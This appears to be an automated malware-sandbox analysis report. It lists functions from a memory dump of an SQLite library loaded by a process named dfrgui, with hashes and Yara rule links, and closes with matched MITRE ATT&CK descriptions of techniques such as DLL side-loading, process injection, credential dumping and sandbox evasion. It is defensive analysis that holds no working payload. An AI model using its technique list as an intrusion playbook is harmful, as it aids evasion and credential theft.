Instruction ID: 583e0c0481455caa6c75ff022c47e188926f0f3b29341005a61964eb8cf72c56
Opcode Fuzzy Hash: c90c2e6ff35a4bee36501d6e714bb0dfd495fc428590a741b0cbc8e4548deae3
Instruction Fuzzy Hash: AEB1E170A4426A8FEB70CF28C984BE9BBF0AF48314F1085E9D55CAB251E7749E84CF41

Function 61E24332 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

sqlite3_result_text.SQLITE3 ref: 61E24503
sqlite3_result_int.SQLITE3 ref: 61E24519

Strings

table, xrefs: 61E243B7

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_result_intsqlite3_result_text
String ID: table
API String ID: 280509166-4129918790
Opcode ID: d660a12f6fc74d83e21062bcc983535fd6bd51b6e531ec20f645487c467dd245
Instruction ID: eb61f0a1e3892f62c22f5010c3316550c413b37e8eda91482d418959da93f8a5
Opcode Fuzzy Hash: d660a12f6fc74d83e21062bcc983535fd6bd51b6e531ec20f645487c467dd245
Instruction Fuzzy Hash: 8D5109B4608245DFDB04CF58C494A49BBF0FB49324F29C69AE8A89B391C374E982CF51

Function 61E07CF9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

sqlite3_strnicmp.SQLITE3 ref: 61E07D43

Strings

', xrefs: 61E07D82
null, xrefs: 61E07D39

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_strnicmp
String ID: '$null
API String ID: 1961171630-2611297978
Opcode ID: afaa851e44edb4a06bbb5051f2478cb7775ba98bc64e4a5d03a680c2d0b1191a
Instruction ID: e426d0171b2ab8ad5ec81f0d584a2be7877cfec37c3ce9497529c86763ff6665
Opcode Fuzzy Hash: afaa851e44edb4a06bbb5051f2478cb7775ba98bc64e4a5d03a680c2d0b1191a
Instruction Fuzzy Hash: 0E31EC21E4954A4FF7018AB4C4653A5BBD36B8731EF78C168D5C54E386E135DCA68381

Function 61E16076 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E1608D
sqlite3_mutex_leave.SQLITE3 ref: 61E16161

Part of subcall function 61E15474: sqlite3_mutex_try.SQLITE3(?,?,?,61E154F4), ref: 61E15414

Strings

&, xrefs: 61E160FC

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
String ID: &
API String ID: 2389339727-1010288
Opcode ID: 18ad915ca9dc1e16fe5d4a93ba5a58ab6d01ae482d0a3670069cc5a2447663d5
Instruction ID: 4e7fd787767f7b556277f850b0811cc611a3ca0f27a6250344edc21156ed4bb8
Opcode Fuzzy Hash: 18ad915ca9dc1e16fe5d4a93ba5a58ab6d01ae482d0a3670069cc5a2447663d5
Instruction Fuzzy Hash: 1A310774708686CFCB14DF68C48199AB7F1BF4E318F24C569E9198B305D771E851CB91

Function 61EAF6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 61EAF750
VirtualProtect.KERNEL32 ref: 61EAF792

Strings

@, xrefs: 61EAF77B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: @
API String ID: 1027372294-2766056989
Opcode ID: 291e62d0b65acdb3804ba4f4353593b383c4c3d38d689e226719f6992fe71c3d
Instruction ID: 72469ffa855b879332cf23c1f6dee206cdc5c9e6b13282e07da88e997c7ce961
Opcode Fuzzy Hash: 291e62d0b65acdb3804ba4f4353593b383c4c3d38d689e226719f6992fe71c3d
Instruction Fuzzy Hash: EF314CB29147018FD710DF78C98465ABBE0FB85354F65C92CE868CB350E734E844CB91

Function 61E744CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

3, xrefs: 61E74531

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 18255896972f354fe8edee4655c3d6f72978fc17c905822ea97ae867ea529818
Instruction ID: 2b3d0a56b7a3f9f6a2ff54822e9b7025fed9fcaa522d9cb043f94dc2034ad852
Opcode Fuzzy Hash: 18255896972f354fe8edee4655c3d6f72978fc17c905822ea97ae867ea529818
Instruction Fuzzy Hash: 5F315E74A042648FEB21DF64C880BD9BBF0FF49318F1485AAD9889B346D774E985CF91

Function 61E2C595 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E2C5DA
sqlite3_mutex_leave.SQLITE3 ref: 61E2C616

Strings

,ea, xrefs: 61E2C5C4

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave
String ID: ,ea
API String ID: 1477753154-3149854123
Opcode ID: 461890c5a612d5c343bdb3d9de9d4891c12c1c0ec9f02166e6a97d2eb5b15cf4
Instruction ID: e04949e4e53aa93c19c0332e237ca6e1bba4f18db27392c5a3b13dbff35c857b
Opcode Fuzzy Hash: 461890c5a612d5c343bdb3d9de9d4891c12c1c0ec9f02166e6a97d2eb5b15cf4
Instruction Fuzzy Hash: 461180B5A007049FCB00DF99E89075EBBB5FB8A315F24806AD9185B300D336E562CBE1

Function 61E20BAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

sqlite3_value_bytes.SQLITE3 ref: 61E20BEA
sqlite3_value_blob.SQLITE3 ref: 61E20BF7

Strings

(wa, xrefs: 61E20BD5

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_blobsqlite3_value_bytes
String ID: (wa
API String ID: 1063208240-974091103
Opcode ID: 1999ff6ddd11e3af036ff7f158af48db368a2fae868971e75e639f74767f4251
Instruction ID: 31de16ea8310f8e34a4f3e5bebdefe4b97bb52d58e160e2d54f3f07315b2dcb6
Opcode Fuzzy Hash: 1999ff6ddd11e3af036ff7f158af48db368a2fae868971e75e639f74767f4251
Instruction Fuzzy Hash: 2201F5B14087588FDB10AF19C8954A47FA0FB09264F24C59AE9B48F391D33AD151CBC0

Function 61E042DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

sqlite3_stricmp.SQLITE3(?,61E05A71), ref: 61E0430A
sqlite3_stricmp.SQLITE3(?,61E05A71), ref: 61E04322

Strings

main, xrefs: 61E0431B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_stricmp
String ID: main
API String ID: 912767213-3207122276
Opcode ID: d8efa5a212f7b4346797c106445efde118f8cd9e276745e6ce7f23239f3da02c
Instruction ID: f77c34372e1fad46023bd808200f218c2d99c64b51b32ce27b43f5e1d6d7d936
Opcode Fuzzy Hash: d8efa5a212f7b4346797c106445efde118f8cd9e276745e6ce7f23239f3da02c
Instruction Fuzzy Hash: 33F0F6726083045BB7005FAF978051AFBE8EEE162BB71C23FDD5447780DA31E4148661

Function 61E1E7DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_aggregate_context.SQLITE3 ref: 61E1E7F5
sqlite3_result_error.SQLITE3 ref: 61E1E836

Strings

Gva, xrefs: 61E1E82B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_aggregate_contextsqlite3_result_error
String ID: Gva
API String ID: 3157865255-4274906976
Opcode ID: e5e6e311253e2eb6cda360db88fd489ec0feaa57308ea8a9497f03290d4c01a3
Instruction ID: 7cf7fe5c5ad7317573e5cdd6872cb98e6548a8ebb48cc83ea54221d3824caeb3
Opcode Fuzzy Hash: e5e6e311253e2eb6cda360db88fd489ec0feaa57308ea8a9497f03290d4c01a3
Instruction Fuzzy Hash: 30F08CB1908B41CFEB019F99C582709BBE0FB81328F28C45CFC888B689D730D841CB92

Function 61E0F0E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_stricmp.SQLITE3 ref: 61E0F100
sqlite3_stricmp.SQLITE3 ref: 61E0F127

Strings

\sa, xrefs: 61E0F11C

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_stricmp
String ID: \sa
API String ID: 912767213-1597807176
Opcode ID: ef1622ea3ace8a57668531ac305ddc8856e60f5843014290b6848bccce5730a9
Instruction ID: e016dfacd26ba7bce8891a26f68946e7ed1232e13c71061db8ded24f90a3352f
Opcode Fuzzy Hash: ef1622ea3ace8a57668531ac305ddc8856e60f5843014290b6848bccce5730a9
Instruction Fuzzy Hash: 31F09AB66083168BE7005F15ED4236B7BE4EBC2369F78C42CD8844B380D335E8218BA6

Function 61E429FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

sqlite3_initialize.SQLITE3 ref: 61E42A06
sqlite3_str_vappendf.SQLITE3 ref: 61E42A51

Part of subcall function 61E191A0: sqlite3_str_append.SQLITE3 ref: 61E1921C
Part of subcall function 61E191A0: sqlite3_str_append.SQLITE3 ref: 61E19250

Strings

F, xrefs: 61E42A20

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_str_append$sqlite3_initializesqlite3_str_vappendf
String ID: F
API String ID: 907554859-1304234792
Opcode ID: d33a793d8dd59e0ee27c5b7c9ac4937a6bf42577e1114fa497df28b285954bba
Instruction ID: 58657976c9710224f0926a0af73f738a370d0adb917b6ba86beb055e83ee0c97
Opcode Fuzzy Hash: d33a793d8dd59e0ee27c5b7c9ac4937a6bf42577e1114fa497df28b285954bba
Instruction Fuzzy Hash: 62F0E7B090438A9BDB00DFA8D58478EBBF5AB81348F208429D8489F344E736D548CB91

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
